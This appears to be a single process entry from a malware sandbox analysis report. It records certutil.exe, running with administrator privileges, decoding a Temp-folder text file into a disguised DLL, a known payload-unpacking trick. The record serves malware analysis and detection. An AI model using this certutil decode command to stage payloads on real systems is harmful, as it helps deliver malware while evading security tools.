Start time:	09:52:26
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Imagebase:	0xffee0000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true